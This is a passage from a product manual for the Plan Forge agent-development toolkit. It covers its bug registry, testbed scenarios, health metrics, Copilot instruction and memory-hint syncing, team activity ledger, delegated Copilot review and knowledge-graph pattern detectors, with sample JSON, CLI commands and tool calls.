│  Parallel axis (not a tier):                                    │
│    Lattice, .forge/lattice/{chunks,edges}.jsonl                 │
│    (code-graph; queried alongside, not stacked on, memory)      │
└─────────────────────────────────────────────────────────────────┘
L1/L2/L3 are the same tiers. Hallmark adds a contract to what gets written. Anvil hardens the L2 → L3 doorway. forge_sync_memories pushes upward into Copilot. Lattice sits beside everything as a separate code-graph axis the agent queries the same way it queries memory.
forge_memory_report, forge_hallmark_show, forge_hallmark_verify, and the lattice tools.
pforge lattice, pforge memory, and pforge sync-memories subcommand.
Every bug, fingerprinted. Every fix, validated. The registry remembers.
forge_bug_register → forge_bug_list → forge_bug_update_status → forge_bug_validate_fix. Records live in .forge/bugs/<bugId>.json.
Bugs found by the Tempering quorum, visual-diff scanners, or regression guard used to live in ad-hoc CHANGELOG entries and stray comments. They got fixed, forgotten, and then re-discovered three sprints later with different symptoms. The Bug Registry gives every scanner-discovered bug a durable record: fingerprinted, classified, tracked, and validated.
When a bug is registered, the classifier computes a fingerprint from the scanner name + test name + assertion message + normalized stack trace. Re-registering the same fingerprint returns DUPLICATE_BUG with the existing bugId, no noise, no duplication.
Every bug moves through an explicit state machine:
open → in-fix → validating → fixed
↘ wont-fix
↘ duplicate
open → noise (classifier ruled it a false positive)
Transitions are enforced by forge_bug_update_status. An illegal transition returns INVALID_TRANSITION.
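The state machine can be sketched as a transition table plus a guard. The table is transcribed from the diagram above; where the wont-fix and duplicate branches attach is not clear from the diagram, so this sketch assumes they leave from open. `updateStatus` is a hypothetical stand-in, not the real forge_bug_update_status.

```javascript
// Allowed transitions, keyed by current status. Attaching wont-fix and
// duplicate to "open" is an assumption; the diagram's branch point is ambiguous.
const TRANSITIONS = {
  open: ["in-fix", "wont-fix", "duplicate", "noise"],
  "in-fix": ["validating"],
  validating: ["fixed"],
};

// Returns the updated bug on a legal move, or an INVALID_TRANSITION error.
function updateStatus(bug, next) {
  const allowed = TRANSITIONS[bug.status] || [];
  if (!allowed.includes(next)) {
    return { ok: false, code: "INVALID_TRANSITION", from: bug.status, to: next };
  }
  return { ok: true, bug: { ...bug, status: next } };
}

const bug = { bugId: "bug-001", status: "open" };
console.log(updateStatus(bug, "in-fix"));
console.log(updateStatus(bug, "fixed"));
```

Terminal states simply have no entry in the table, so any move out of them falls through to the error branch without special-casing.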
The classifier inspects evidence (test name, assertion message, stack trace, flakiness history) and returns one of:
real-bug: evidence is consistent across scanners; record is persisted and captured to L3 memory.
flaky: evidence shows inconsistency; ignored unless confirmed across multiple runs.
noise: a triage classification applied by the audit classifier (e.g. "known false-positive pattern"). It is not a bug status. Bugs flagged as noise are typically resolved as wont-fix with the classification recorded in bug.triage.
Only real-bug outcomes write to .forge/bugs/ and fire tempering-bug-registered.
forge_bug_validate_fix re-runs the scanner that originally found the bug. On pass, the record moves to fixed, a tempering-bug-validated-fixed event fires, and, if OpenBrain is configured, an L3 thought is written so the next session knows what broke and what fixed it.
Pass scannerOverride to validate with an equivalent scanner. The validation log preserves both scanner names for audit.
The dashboard's Triage tab shows open bugs by severity, with status chips and quick-transition buttons. The Watcher's Home chip includes an open-bugs count. Bugs are cross-linked to incidents via forge_incident_capture.
A separate repo. A library of scenarios. End-to-end proof that the shop still works.
forge_testbed_run. Scenarios: docs/plans/testbed-scenarios/*.json. Findings: docs/plans/testbed-findings/*.json. Requires testbed.path in .forge.json.
Unit tests cover one module; integration tests cover one service. Neither tells you whether the full Plan-Forge pipeline still produces a clean, shippable outcome on a real repo under a real scenario. The Testbed does: it is a second, dedicated repository that Plan Forge treats as a read-write fixture, replays a scenario against, and records a defect log for.
The canonical reference testbed lives at srnichols/plan-forge-testbed. It's a real .NET 10 application, TimeTracker, a billable-hours tracker with Clients, Projects, Time Entries, Billing, Invoices, and Dashboard surfaces, used as the worked example throughout this manual.
If you're learning Plan-Forge by doing, work through it in this order:
1. docs/plans/Phase-1-CLIENTS-CRUD-PLAN.md: see how pforge run-plan drives a four-slice CRUD feature with [P] parallelism, [depends:], [scope:], and validation gates.
2. docs/plans/Phase-2-WEB-UI-PLAN.md: Plan-Forge builds a Blazor Server + Microsoft Fluent UI front-end against the existing REST API. The plan demonstrates that pforge produces enterprise-grade UI: layered (page → service interface → repository, never DbContext in components), accessible (WCAG 2.1 AA), and tested (bUnit). This is the proof artifact for "pforge does not vibe-code."
3. docs/plans/testbed-scenarios/*.json: the synthetic regressions in the section below, replayed end-to-end via forge_testbed_run.
The .NET preset ships three artifacts that make Step 2 work on any consuming project; they are not testbed-specific:
| Artifact | Path | Purpose |
|---|---|---|
| Instruction file | .github/instructions/blazor-fluent-ui.instructions.md | Auto-loads on *.razor edits. Forbids DbContext in components, mandates code-behind split, lifecycle discipline, accessibility checklist. |
| Reviewer agent | .github/agents/blazor-reviewer.agent.md | Read-only audit of UI changes for layer violations, lifecycle bugs, and Fluent UI misuse. |
| Skill | .github/skills/ui-scaffold/SKILL.md | /ui-scaffold <Entity> --crud generates the page + DTO + service interface + bUnit test in one shot, enforcing the layering rules. |
No DbContext in .razor, every page accessible, every component tested.
Scenarios are JSON files under docs/plans/testbed-scenarios/. Each one describes:
A scenario is idempotent: the Testbed resets the fixture repo to the pinned commit before every run.
forge_testbed_run:
- Takes the lock at .forge/testbed.lock (one scenario at a time per testbed).
- Checks that the testbed has no uncommitted changes (ERR_TESTBED_DIRTY if not).
- Writes findings to docs/plans/testbed-findings/ and emits testbed-scenario-completed.
| Code | Meaning | Recovery |
|---|---|---|
| ERR_TESTBED_NOT_FOUND | testbed.path missing or invalid | Set it in .forge.json |
| ERR_TESTBED_DIRTY | Uncommitted changes in the testbed | Commit or stash inside the testbed repo |
| ERR_TESTBED_LOCKED | Another scenario is running | Wait, or remove a stale .forge/testbed.lock |
Findings with defects feed two consumers, one of which is the Bug Registry, through forge_bug_register.
A single fingerprint for "how healthy is this project today?", persisted, trended, compared.
forge_health_trend (LiveGuard), writes .forge/health-dna.jsonl. Intent: health-dna. Aliases: health-analysis, system-health, health-report.
Any single metric can lie. A project with 100% green tests can still be drowning in drift. A low drift score can mask a CVE backlog. The Health DNA combines five independent signals into one daily fingerprint so slow decay, the kind where everything looks fine but tomorrow's plan costs 2× yesterday's, becomes visible.
| Signal | Source | What it catches |
|---|---|---|
| Drift score | forge_drift_report | Architecture diverging from plan baseline |
| Incident rate | forge_incident_capture | Production failures over trailing window |
| Test pass rate | CI + testbed findings | Regression risk |
| Model success rate | Orchestrator telemetry | Agent failures + escalation frequency |
| Cost per slice | Cost ledger | Token-burn creep, the project getting harder to reason about |
{
"timestamp": "2026-04-20T00:00:00Z",
"driftScore": 0.91,
"incidentRate7d": 0,
"testPassRate": 0.998,
"modelSuccessRate": 0.96,
"costPerSlice": 0.34,
"composite": 0.93,
"delta7d": -0.02,
"delta30d": -0.08
}
composite is a weighted blend computed inside forge_health_trend (current default weights: drift 0.30, incident-rate 0.25, test-pass 0.20, model-success 0.15, cost 0.10; see pforge-mcp/server.mjs). delta7d and delta30d compare against historical records: a small negative delta is noise, a sustained negative delta is decay.
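A rough sketch of the blend, using the default weights quoted above. It assumes each signal has already been normalized to a score between 0 and 1 where higher is healthier. How forge_health_trend turns an incident count or a dollar cost into such a score is not described here, so that step is left out, and the sketch will not reproduce the sample record's composite. The baseline rule in `delta` (most recent record at least N days older than the latest) is also an assumption, as are all function and field names.

```javascript
// Default weights as quoted in the text; they sum to 1.
const WEIGHTS = { drift: 0.30, incidentRate: 0.25, testPass: 0.20, modelSuccess: 0.15, cost: 0.10 };

// Weighted blend of normalized scores (each in [0, 1], higher is healthier).
function composite(scores) {
  let total = 0;
  for (const [signal, weight] of Object.entries(WEIGHTS)) {
    const value = scores[signal];
    if (typeof value !== "number" || value < 0 || value > 1) {
      throw new RangeError(`${signal} must be a score in [0, 1]`);
    }
    total += weight * value;
  }
  return Math.round(total * 100) / 100;
}

// Change in composite versus the most recent record at least `days` older
// than the latest one. Returns null when no such record exists.
function delta(records, days) {
  const latest = records[records.length - 1];
  const cutoff = Date.parse(latest.timestamp) - days * 86_400_000;
  const baseline = [...records].reverse().find((r) => Date.parse(r.timestamp) <= cutoff);
  return baseline ? Number((latest.composite - baseline.composite).toFixed(2)) : null;
}
```

Because drift carries the largest weight, a modest drop in the drift score moves the composite more than the same drop in cost.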
The watcher can alert on Health DNA thresholds:
- delta7d < -0.10: short-term regression, usually tied to a specific slice.
- delta30d < -0.15: long-term decay, usually architectural.
- composite < 0.60: absolute floor; blocks new executions until addressed.
The LiveGuard dashboard's Health tab renders the composite score as a sparkline, with per-signal sub-lines toggleable. The Forge Intelligence page cross-references Health DNA with the OpenBrain memory corpus: "your drift score dropped the day you added the new caching layer" is exactly the kind of conclusion the Learn station exists to surface.
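The three watcher thresholds can be expressed as a small rule check. This is a sketch only: the function name and the alert shape are hypothetical, while the threshold values, their meanings, and the record fields come from the text and the sample record.

```javascript
// Evaluate one Health DNA record against the three watcher thresholds.
function evaluateAlerts(record) {
  const alerts = [];
  if (record.delta7d < -0.10) {
    alerts.push({ rule: "delta7d", kind: "short-term regression", blocking: false });
  }
  if (record.delta30d < -0.15) {
    alerts.push({ rule: "delta30d", kind: "long-term decay", blocking: false });
  }
  if (record.composite < 0.60) {
    // Only the absolute floor blocks new executions.
    alerts.push({ rule: "composite", kind: "absolute floor", blocking: true });
  }
  return alerts;
}
```

Run against the sample record earlier in this chapter (composite 0.93, delta7d -0.02, delta30d -0.08), no rule fires.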
How Plan Forge teaches GitHub Copilot about your project: three tools, two generated files, one dashboard tab, zero manual setup after the first run.
forge_sync_memories, forge_sync_instructions, and the Settings → Copilot dashboard tab. Together they make every new Copilot conversation start with full project context, no manual context-paste, no copy-and-rebuild instruction files.
GitHub Copilot reads two files automatically when you open a workspace:
- .github/copilot-instructions.md: "what you must always know about this project". Architectural rules, naming conventions, build commands, security commitments.
- .github/copilot-memory-hints.md: "what we've learned from doing this work". Trajectories from prior plans, recurring patterns, auto-skills extracted from successful slices.
Both files predate Plan Forge, and you can hand-author them. But hand-authoring means: (a) they go stale the moment you ship the next plan, (b) every team member writes a slightly different one, and (c) when the underlying decisions change in .forge.json or PROJECT-PRINCIPLES.md, nothing reminds you to regenerate.
The trilogy solves all three problems by making both files build outputs, not human-authored sources:
| Tool | Writes | Reads from | Run when |
|---|---|---|---|
| forge_sync_instructions | .github/copilot-instructions.md | project profile, principles, extra .instructions.md files, .forge.json | Architectural rules change |
| forge_sync_memories | .github/copilot-memory-hints.md | trajectories (.forge/trajectories/), auto-skills, brain entries | After each plan ships |
| Settings → Copilot tab | — (preview + apply both above) | live state from the two tools | Anytime you want to inspect before applying |
forge_sync_instructions handles the "always true" facts; forge_sync_memories handles the "we learned this last week" facts. The dashboard tab handles "let me look before I commit".
Both tools are idempotent and additive. They use content-hash deduplication, so running the same sync twice in a row produces zero file changes. They also use atomic write (temp file + rename), so a crash mid-write never leaves a half-baked file.
forge_sync_instructions: the "always true" file
forge_sync_instructions generates .github/copilot-instructions.md by composing four sources, in this order:
1. Project profile (docs/plans/PROJECT-PROFILE.md): the tech stack, build commands, key paths. Generated once via the project-profile.prompt.md in Session 1.
2. Project principles (docs/plans/PROJECT-PRINCIPLES.md): non-negotiable architectural and engineering commitments. Generated via project-principles.prompt.md.
3. Extra instruction files (.github/instructions/*.instructions.md): auto-loaded by Copilot via their applyTo frontmatter. The trilogy stitches the relevant ones into the master file so Copilot sees them as a single context.
4. .forge.json commitments: tech choices that the project has locked in (e.g. "database": "postgres", "frontend": "react").
The output is a single Markdown file of roughly 150–400 lines (depending on profile complexity) with a deterministic structure: Identity → Stack → Build commands → Architectural rules → Forbidden patterns → Cost guardrails → Talking to Plan Forge tools.
# Generate (preview only, does not write)
pforge sync-instructions --preview
# Generate and write
pforge sync-instructions
# Force overwrite even if file is identical (skips hash check)
pforge sync-instructions --force
forge_sync_instructions({ preview: true })
// → { ok: true, written: false, diff: "...", contentHash: "sha256:..." }
forge_sync_instructions({ preview: false })
// → { ok: true, written: true, path: ".github/copilot-instructions.md", contentHash: "..." }
The generated file follows a canonical template so that Copilot Chat's prompt-injection logic finds the same anchors every time:
# Instructions for Copilot
> **Project**: <name>
> **Stack**: <stack summary>
> **Generated by**: forge_sync_instructions @ v3.x
## Architecture Principles
<merged from architecture-principles.instructions.md + project-principles>
## Project Overview
<merged from PROJECT-PROFILE.md>
## Quick Commands
<merged from project profile + .forge.json>
## Coding Standards
<stack-specific from instructions/>
## Planning & Execution
<pipeline + prompts overview>
## Cost Estimates
<always-included; mandates forge_estimate_quorum>
## Talking to Forge-Master
<always-included; mandates forge_master_ask for open-ended reasoning>
forge_sync_memories: the "we learned this" file
forge_sync_memories generates .github/copilot-memory-hints.md by harvesting three runtime sources:
- Trajectories (.forge/trajectories/*.jsonl): per-slice notes the worker left for itself: "I tried X, it failed because Y, so I switched to Z". These are the gold for "don't repeat this mistake" guidance.
- Auto-skills (.forge/auto-skills/*.md): reusable patterns extracted by the Inner Loop. If three slices all needed the same shape of repository test, the fourth slice gets it for free as a skill, and Copilot Chat should know it exists too.
- Brain entries: captured via forge_memory_capture or auto-stamped by tools like forge_run_plan.
Each source is filtered, hashed, deduped, and ranked by recency × signal strength. The output is bounded to ~80–120 lines so Copilot's context budget stays healthy.
If you write anything between the <!-- pforge:custom --> and <!-- /pforge:custom --> markers, the sync tool preserves it verbatim. Only the <!-- pforge:auto --> region is regenerated.
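A sketch of how a regeneration step could honor those markers. This is not the forge_sync_memories source; the function names are hypothetical and the layout (header, auto region, custom region) simply mirrors the sample file in this section. The idea shown is: lift the custom region out of the existing file, rebuild everything else, and put the custom region back untouched.

```javascript
const AUTO_OPEN = "<!-- pforge:auto -->";
const AUTO_CLOSE = "<!-- /pforge:auto -->";
const CUSTOM_OPEN = "<!-- pforge:custom -->";
const CUSTOM_CLOSE = "<!-- /pforge:custom -->";

// Return the text between two markers, or null if either marker is missing.
function extractRegion(text, open, close) {
  const start = text.indexOf(open);
  if (start === -1) return null;
  const end = text.indexOf(close, start + open.length);
  if (end === -1) return null;
  return text.slice(start + open.length, end);
}

// Rebuild the file: fresh header and auto region, custom region carried over verbatim.
function mergeHints(existingFile, header, generatedBody) {
  const custom = extractRegion(existingFile, CUSTOM_OPEN, CUSTOM_CLOSE) ?? "\n";
  return [
    header,
    AUTO_OPEN,
    generatedBody.trim(),
    AUTO_CLOSE,
    CUSTOM_OPEN + custom + CUSTOM_CLOSE,
    "",
  ].join("\n");
}
```

Merging the output with the same header and body a second time yields an identical string, which is the property a content-hash check relies on to skip no-op writes.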
# After every plan ships
pforge sync-memories
# Limit to trajectories from the last 14 days (default: last 50 trajectories)
pforge sync-memories --since=14d
# Verbose: show which entries were included/excluded and why
pforge sync-memories --explain
# Copilot Memory Hints
> **Generated by**: forge_sync_memories @ v3.x
> **Last sync**: 2026-05-17T14:22:11Z · 47 trajectories, 12 auto-skills, 8 brain entries
<!-- pforge:auto -->
## Recently learned patterns
- **Snapshot pop** uses `git stash apply` + explicit drop, not blind `git stash pop` (lesson from #201)
- **Vitest output parser** ignores subagent hallucination markers (lesson from #198)
- ...
## Auto-skills available
- `repository-vitest-pattern`, generated 2026-05-12 from 4 slices
- `bicep-rbac-scaffold`, generated 2026-05-10 from 3 slices
<!-- /pforge:auto -->
<!-- pforge:custom -->
<!-- Anything you write here is preserved across syncs -->
<!-- /pforge:custom -->
If you'd rather see the diff before it lands, open the dashboard and navigate to Settings → Copilot. The tab gives you four panels:
| Panel | Shows | Actions |
|---|---|---|
| Current file | Live content of .github/copilot-instructions.md | Read-only viewer with syntax highlighting |
| Preview regenerated | What forge_sync_instructions would write right now | Inline diff vs the current file |
| Memory hints | Live content of copilot-memory-hints.md + count of entries by source | "Regenerate now" button → calls forge_sync_memories |
| Apply | Confirmation banner with the hash of what's about to be written | "Sync instructions" / "Sync memories" / "Sync both" buttons |
Backed by three REST endpoints (full reference: Appendix W — Copilot integration):
GET /api/copilot-instructions # read current file
POST /api/copilot-instructions/preview # generate without writing
POST /api/copilot-instructions/sync # generate + write atomically
| Event | Run | Why |
|---|---|---|
| Initial project setup | sync-instructions | Bootstraps Copilot with stack + commands |
| After edits to PROJECT-PROFILE.md or PROJECT-PRINCIPLES.md | sync-instructions | Architectural facts changed |
| After a plan ships | sync-memories | New trajectories, possibly new auto-skills |
| Weekly maintenance | Both | Catch drift; safe even if nothing changed (hash dedup skips no-op writes) |
| CI on main push | Both, with --preview + fail-on-diff | Catches "developer forgot to sync after editing PRINCIPLES" |
Wire pforge sync-memories into the PostSlice hook (already shipped in templates/.github/hooks/PostSlice.md). Every successful slice then feeds the next Copilot conversation. Zero manual upkeep.
For the full tool-by-tool reference, see docs/capabilities.md on GitHub. The three trilogy surfaces, at a glance:
| Surface | MCP tool | CLI | REST | Since |
|---|---|---|---|---|
| Memory hints | forge_sync_memories | pforge sync-memories | n/a (CLI-only) | v2.99 |
| Instructions | forge_sync_instructions | pforge sync-instructions | POST /api/copilot-instructions/sync | v3.0 |
| Dashboard tab | n/a (UI) | n/a (UI) | GET /api/copilot-instructions, POST /api/copilot-instructions/preview | v3.1 |
Two developers running Plan Forge on the same repo at the same time hit three predictable problems: concurrent edits collide at merge time, hard-won fixes stay trapped in one developer's local .forge/, and a productive day turns every reviewer into a bottleneck. This chapter shows how Plan Forge solves all three with a single shared file and a few GitHub API calls: no SaaS backend, no shared database, no new identity system.
forge_team_dashboard + forge_team_activity (per-developer visibility), forge_github_metrics + forge_github_status (PR throughput + validation stack), forge_delegate_review (dispatching review to Copilot's cloud agent), and forge_classifier_issue (closing the tempering audit loop by filing a GitHub issue when a classifier rule needs to land).
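The three coordination problems in detail:
- Concurrent edits collide at merge time.
- Hard-won fixes stay trapped in one developer's local .forge/.
- A productive day turns every reviewer into a bottleneck.
v3.x addresses each, in order: team dashboard for visibility, shared activity ledger + memory sync for institutional memory, delegated review for the review bottleneck.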
Everything starts with one file: .forge/team-activity.jsonl. It is an append-only JSON Lines log that every Plan Forge operation writes to. One event per line, never edited, never compacted.
{"ts":"2026-05-17T09:14:22Z","actor":"alice@example.com","action":"plan.start","plan":"Phase-31","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:18:41Z","actor":"alice@example.com","action":"slice.commit","plan":"Phase-31","slice":"2","sha":"e4f5g6h"}
{"ts":"2026-05-17T09:31:02Z","actor":"bob@example.com","action":"plan.start","plan":"Phase-32","sha":"a1b2c3d"}
{"ts":"2026-05-17T09:33:11Z","actor":"alice@example.com","action":"plan.complete","plan":"Phase-31","slices":6,"costUsd":2.41}
The file is small (typical: 50–200 KB per team-week), git-friendly (line-stable), and trivially indexable. Every team query in this chapter is a streaming read of this file.
.forge/team-activity.jsonl is not gitignored, and that is the point. Commit it. The ledger is most useful when every developer's events land in one shared history. If you don't want it in git, set team.ledger.gitignore: true in .forge.json and use a side channel (S3, shared volume) instead.
forge_team_dashboard: per-developer cards
forge_team_dashboard reduces the ledger into one card per developer, capturing the last 7 days (default; configurable):
forge_team_dashboard({ windowDays: 7 })
// Response shape (excerpt):
{
generatedAt: "2026-05-17T14:00:00Z",
windowDays: 7,
developers: [
{
actor: "alice@example.com",
lastActive: "2026-05-17T09:33:11Z",
runs: 12,
successRate: 0.917,
costUsd: 28.40,
plans: ["Phase-31", "Phase-30", "Phase-29"],
activePlan: null
},
{
actor: "bob@example.com",
lastActive: "2026-05-17T09:31:02Z",
runs: 4,
successRate: 1.0,
costUsd: 6.12,
plans: ["Phase-32"],
activePlan: "Phase-32" // currently running
}
],
totals: { runs: 16, successRate: 0.938, costUsd: 34.52 }
}
This is what backs the Team dashboard tab: one card per developer, sorted by recency, with a visual badge for "currently running a plan". The same shape powers the pforge team-dashboard CLI command for terminal users.
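To make "reduces the ledger into one card per developer" concrete, here is a simplified sketch of such a reduction over JSON Lines text. It is not the forge_team_dashboard implementation: the function name and options are hypothetical, and it derives only the fields that the four sample ledger events can support (lastActive, plans, activePlan, costUsd). runs and successRate are omitted because the events that would feed them are not shown in this chapter.

```javascript
// Reduce JSONL ledger text to one card per actor, most recently active first.
function buildCards(jsonl, { now, windowDays = 7 }) {
  const cutoff = Date.parse(now) - windowDays * 86_400_000;
  const cards = new Map();
  for (const line of jsonl.split("\n")) {
    if (!line.trim()) continue; // tolerate blank lines
    const event = JSON.parse(line);
    if (Date.parse(event.ts) < cutoff) continue; // outside the window
    let card = cards.get(event.actor);
    if (!card) {
      card = { actor: event.actor, lastActive: event.ts, plans: [], activePlan: null, costUsd: 0 };
      cards.set(event.actor, card);
    }
    // ISO-8601 UTC timestamps in one format sort correctly as strings.
    if (event.ts > card.lastActive) card.lastActive = event.ts;
    if (event.plan && !card.plans.includes(event.plan)) card.plans.push(event.plan);
    if (event.action === "plan.start") card.activePlan = event.plan;
    if (event.action === "plan.complete") {
      if (card.activePlan === event.plan) card.activePlan = null;
      card.costUsd += event.costUsd ?? 0;
    }
  }
  return [...cards.values()].sort((a, b) => b.lastActive.localeCompare(a.lastActive));
}
```

Fed the four sample events from the ledger section, this marks Bob as currently running Phase-32 and Alice as idle, matching the activePlan values in the response excerpt above.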
Above the cards, the dashboard renders a conflict-risk banner computed from the active plans of any two developers running simultaneously. The risk score is derived from Scope Contract overlap:
| Score | Trigger | Banner |
|---|---|---|
| none | No active plans, or disjoint Scope Contracts | (hidden) |
| low | Active plans touch sibling files in the same directory | "Alice and Bob are both working in src/orders/, sync up before merge." |
| medium | Active plans share at least one file path | "⚠️ Alice and Bob are both editing src/orders/repository.ts." |
| high | Active plans share files AND share modified symbols (per forge_diff) | "🚨 High collision risk. One of you should pause." |
forge_team_activity: querying the ledger
Where forge_team_dashboard aggregates, forge_team_activity queries. Pass any combination of filters:
forge_team_activity({
actor: "alice@example.com", // optional, who
plan: "Phase-31", // optional, what
action: "slice.commit", // optional, kind
since: "2026-05-10T00:00:00Z",// optional, when
limit: 100, // bounded; default 50, max 1000
cursor: null // pagination
})
// Response:
{
events: [ /* event objects */ ],
total: 47,
hasMore: false,
cursor: null
}
This is the tool to reach for when answering questions like "what did Alice work on last week?" or "show me every slice that Phase-31 took and who ran which retry". It is also the data source for the pforge team-activity CLI and the GET /api/team/activity REST endpoint.
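The filter and pagination semantics can be sketched over an in-memory array of ledger events. The sketch assumes all filters are ANDed together and that the cursor is an opaque string encoding an offset. Both are guesses about behavior, not documented facts, and `queryActivity` is a hypothetical name. The default of 50 and maximum of 1000 come from the parameter comments above.

```javascript
// Filter ledger events and return one page in the documented response shape.
function queryActivity(ledger, { actor, plan, action, since, limit = 50, cursor = null } = {}) {
  const pageSize = Math.min(Math.max(1, limit), 1000); // clamp to 1..1000
  const matched = ledger.filter(
    (e) =>
      (actor === undefined || e.actor === actor) &&
      (plan === undefined || e.plan === plan) &&
      (action === undefined || e.action === action) &&
      (since === undefined || Date.parse(e.ts) >= Date.parse(since))
  );
  const offset = cursor === null ? 0 : Number(cursor); // assumed cursor encoding
  const page = matched.slice(offset, offset + pageSize);
  const next = offset + page.length;
  const hasMore = next < matched.length;
  return { events: page, total: matched.length, hasMore, cursor: hasMore ? String(next) : null };
}
```

A caller pages by passing the returned cursor back in until hasMore is false.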
forge_github_metrics + forge_github_status
The activity ledger captures everything that happens inside Plan Forge. forge_github_metrics and forge_github_status capture everything that happens around it: PR throughput, review latency, CI validation results.
forge_github_metrics
Pulls PR-level analytics from the GitHub API, including PR throughput, review latency, and a per-author breakdown.
The dashboard's GH Metrics tab is a thin renderer over this tool's response.
forge_github_status
The validation stack on a single PR. Given a PR number, returns the required checks, reviewers, and mergeability.
forge_team_activity({ action: "plan.complete" }) → for each plan, find its PR → forge_github_status({ pr: N }). This gives you a single-pane view of "what shipped last week and what state is each PR in".
forge_delegate_review: dispatching to Copilot
Plan Forge's reviewer step (the Reviewer Gate) is independent: a fresh session reads the plan's Scope Contract and audits the diff. By default it runs locally. forge_delegate_review dispatches the same audit task to the GitHub Copilot cloud coding agent, so the review happens server-side and the result lands as a PR comment.
forge_delegate_review({
pr: 247,
plan: "docs/plans/Phase-31-PLAN.md",
scope: "scope-contract", // or "full-plan" | "diff-only"
blockOn: "critical" // file CHANGES_REQUESTED on critical findings
})
// Response:
{
ok: true,
jobId: "copilot-job-7f3a...",
dispatched: "2026-05-17T14:22:11Z",
pr: 247,
estimatedCompletion: "2026-05-17T14:27:00Z"
}
Configuration lives under cloudAgentValidation in .forge.json:
{
"cloudAgentValidation": {
"enabled": true,
"agent": "copilot", // current option: copilot
"trigger": "post-slice-commit", // when to dispatch
"blockOn": "critical",
"timeoutMinutes": 15,
"fallback": "local-reviewer" // if cloud dispatch fails
}
}
forge_classifier_issue: closing the audit loop
The tempering subsystem (Audit Loop chapter) audits classifier output and finds false-positive findings or missed-detection rules. Once tempering has confirmed a rule is needed, forge_classifier_issue files a structured GitHub issue against the rule repository so the rule lands in code, not in a side note.
forge_classifier_issue({
classifier: "audit",
ruleId: "audit-stub-detection",
category: "missed-detection", // or "false-positive"
evidence: [ /* before/after finding pairs */ ],
severity: "high",
rationale: "Three sweeps in a row missed inline TODO markers in JSX comments."
})
// Response:
{
ok: true,
issueNumber: 312,
issueUrl: "https://github.com/.../issues/312",
deduped: false,
hash: "sha256:..."
}
The tool deduplicates against open issues with the same rule + category hash within 14 days, so repeated audit findings don't spam the tracker. This is the official "self-repair" path for classifier rules, analogous to forge_meta_bug_file for plan/orchestrator/prompt defects.
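The 14-day deduplication can be sketched as a lookup before filing. Everything here is illustrative: the issue record shape and function names are hypothetical, and a plain "rule|category" string stands in for the hash the tool computes. The response fields (ok, issueNumber, deduped) follow the example above.

```javascript
const DEDUP_WINDOW_MS = 14 * 24 * 60 * 60 * 1000;

// Find an open issue for the same rule + category filed within the window.
function findDuplicate(openIssues, candidate, nowMs) {
  const key = `${candidate.ruleId}|${candidate.category}`;
  const match = openIssues.find(
    (issue) =>
      issue.state === "open" &&
      `${issue.ruleId}|${issue.category}` === key &&
      nowMs - Date.parse(issue.createdAt) <= DEDUP_WINDOW_MS
  );
  return match ?? null;
}

// File a new issue only when no duplicate exists; `createIssue` is injected.
function fileOrDedupe(openIssues, candidate, nowMs, createIssue) {
  const existing = findDuplicate(openIssues, candidate, nowMs);
  if (existing) return { ok: true, issueNumber: existing.number, deduped: true };
  return { ok: true, issueNumber: createIssue(candidate), deduped: false };
}
```

Injecting `createIssue` keeps the decision logic separate from the GitHub call, so the window rule can be exercised without network access.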
| Tab | Backed by | Surfaces |
|---|---|---|
| Team | forge_team_dashboard | Per-developer cards, conflict-risk banner, "currently running" badges |
| Team Activity | forge_team_activity | Timeline view of the ledger with filter chips |
| GH Metrics | forge_github_metrics | PR throughput, review latency, per-author breakdown |
| PR Status (drill from any PR link) | forge_github_status | Required checks, reviewers, mergeability |
pforge team-dashboard # per-developer cards in the terminal
pforge team-dashboard --json # machine-readable
pforge team-activity --since=7d # query the ledger
pforge team-activity --actor=alice@example.com --action=slice.commit
pforge gh-metrics --window=30d # PR throughput
pforge gh-status --pr=247 # validation stack for one PR
pforge delegate-review --pr=247 --plan=docs/plans/Phase-31-PLAN.md
See also: the Audit Loop chapter for what forge_classifier_issue dispatches; Chapter 26, The Copilot Integration Trilogy, for how shared memory hints close the "Bob hits Alice's bug" gap; and Chapter 7, The Dashboard, for the full tab tour.
Plan Forge writes structured events on every action: slice starts, gate failures, commits, bug filings, cost samples. The knowledge graph stitches those events into a queryable graph, then runs four pattern detectors and a daily digest aggregator across it. The result: you find recurring failures before the failures find you.
forge_graph_query introduced the graph itself; forge_patterns_list added the four detectors; pforge digest ships the daily roll-up that surfaces the most actionable findings into the dashboard's Yesterday's Digest tile.
Every Plan Forge subsystem already writes its own structured log: .forge/runs/*.jsonl, .forge/trajectories/*.jsonl, .forge/bugs/*.json, .forge/cost/*.json, .forge/team-activity.jsonl. Individually, each file answers one question, "what did this run cost?", "what bugs are open?". The interesting questions are cross-file:
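- "Which files are touched by the most failed slices?"
- "Which bugs cluster around the same file or symbol?"
- "Which model has the best success rate on slices in the integration domain?"
Answering any of these requires joining at least three logs. The knowledge graph builds an in-memory representation of those joins so the answer is a millisecond traversal, not a five-file grep.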
Seven node types: Phase, Slice, Commit, File, Run, Bug, CostSample. Six edge types. The whole graph for a year of plans on a medium-sized repo fits in <30 MB of memory and serializes to .forge/graph/snapshot.json in under a second.
The graph is derived, not authoritative. If snapshot.json is deleted, pforge graph rebuild recomputes it from the underlying logs. The logs are the source of truth; the graph is the index.
forge_graph_query: the query surface
Queries take a starting node selector and a traversal expression. The tool is intentionally not a general-purpose graph query language; it ships with a small, opinionated set of canned queries that answer the questions teams actually ask:
forge_graph_query({ query: "hot-files", windowDays: 30 })
// → files touched by the most failed slices in the last 30 days
forge_graph_query({ query: "bug-clusters", windowDays: 90 })
// → bugs grouped by shared file/symbol
forge_graph_query({ query: "model-leaderboard", domain: "integration" })
// → success rate per model on slices tagged with the integration domain
forge_graph_query({ query: "slice-history", slice: "4", windowDays: 180 })
// → every Phase that had a slice 4, with success/cost/duration
forge_graph_query({ query: "phase-roi", phase: "Phase-31" })
// → cost, duration, file churn, bugs raised, bugs closed for one phase
Custom traversals are also accepted via the lower-level traverse form (advanced):
forge_graph_query({
start: { type: "File", path: "src/orders/repository.ts" },
follow: ["touches<-Commit", "produced<-Slice", "raised->Bug"],
filter: { "Bug.status": "open" },
return: ["Bug.id", "Bug.title", "Slice.id", "Phase.id"],
limit: 25
})
forge_patterns_list: the four detectors
forge_patterns_list runs four detector heuristics across the graph and returns ranked findings. Each detector is implemented as a deterministic graph traversal: no ML, no embeddings, just structural pattern matching.
| Detector | Looks for | Signal |
|---|---|---|
| gate-failure-recurrence | Same gate failing across ≥3 slices in different plans within 30 days | "The validation is broken, not the code" |
